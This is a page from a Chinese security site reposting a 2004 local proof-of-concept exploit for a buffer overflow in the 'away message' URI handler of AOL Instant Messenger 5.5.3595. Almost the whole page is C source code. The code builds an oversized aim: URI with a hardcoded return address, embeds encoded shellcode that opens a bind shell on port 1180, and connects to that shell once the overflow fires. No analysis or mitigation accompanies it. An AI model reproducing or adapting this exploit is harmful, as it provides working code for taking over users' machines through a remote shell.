首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL Instant Messenger AIM Away Message Local Exp
来源:www.rosec.info 作者:mandragore 发布时间:2004-08-15  

AOL Instant Messenger AIM "Away" Message Local Exploit/*subject: local PoC exploit for AIM 5.5.3595vendor: http://www.aim.comcve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636credits: Matt Murphydate: 10 August 2004notes: exploits localy if an argument is supplied, otherwise prints the url. offsets are based on exe/dll provided in the package, so it should be NT universal. shellcode makes a bindshell on port 1180.greets: roSec - Romanian Security Research - www rosec infoauthor: mandragore*/#include #include #include #pragma comment(lib,"ws2_32.lib")#define GPA 0x004040a4#define LLA 0x00404088#define fatal(x) { perror(x); exit(1); }unsigned char bsh[]={0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E};char *uri="aim:goaway?message=";unsigned char smalljmp[]={ 0xeb, 0x08 };void client2serv(unsigned int s) { char buff[4096]; for (;;) { fgets(buff,4096,stdin); send(s,buff,strlen(buff),0); }}void sh() { int ret; long s; WSADATA wsa; struct sockaddr_in sin; char buff[4096]; fd_set fds; long host=0x0100007f; WSAStartup(0x202,&wsa); sin.sin_family=2; sin.sin_port=htons(1180); sin.sin_addr = *(struct in_addr *)&host; s=socket(2,1,6); if ( ret=connect(s,(struct sockaddr *)&sin,16) != 0) { fatal("[-] damn.. it looks like it failed\n"); } else printf("[+] connected.\n\n"); CreateThread(0,0,(void *)client2serv,(long *)s,0,0); for (;;) { FD_ZERO(&fds); FD_SET(s,&fds); if (select(s+1, &fds, NULL, NULL, NULL) < 0) fatal("[-] shell.select()"); if (FD_ISSET(s,&fds)) { if ( (ret = recv(s,buff,4096,0)) < 1 ) fatal("[-] shell.recv()"); memset(buff+ret,0,1); printf("%s",buff); } }}void fixsh() { int gpa=GPA^0xdededede, lla=LLA^0xdededede; memcpy(bsh+0x1a,&gpa,4); memcpy(bsh+0x2b,&lla,4);}int main(int argc, char **argv) { char *t; int retaddr=0x10015599; // call ebx from rtvideo.dll, should be stable fixsh(); t=GlobalAlloc(0x40,2000); memset(t,0x41,1500); strncpy(t,uri,strlen(uri)); memcpy(t+1037-4,&smalljmp,2); memcpy(t+1037,&retaddr,4); memcpy(t+1037+4+4,&bsh,sizeof(bsh)); if (argc==1) { printf("%s\n",t); return 0; } printf("[+] sending request..\n"); ShellExecute(0,"open",t,0,0,SW_SHOW); printf("[%%] let's sleep 5secs..\n"); Sleep(5000); sh(); return 0;}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X<=10.3.3 AppleFileS
·BlackJumboDog FTP Server Buffe
·GV PostScript Viewer Remote Bu
·GV Local Buffer Overflow Explo
·LibPNG Graphics Library Remote
·Multiple Cisco Products Vulner
·CVS<=1.11.15 error_prog_nam
·Tcpdump ISAKMP Identification
·Xine 0.99.x vcd input identifi
·FirstClass Desktop 7.1 buffer
·Serv-U local privileges escala
·Panda ActiveScan Control Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved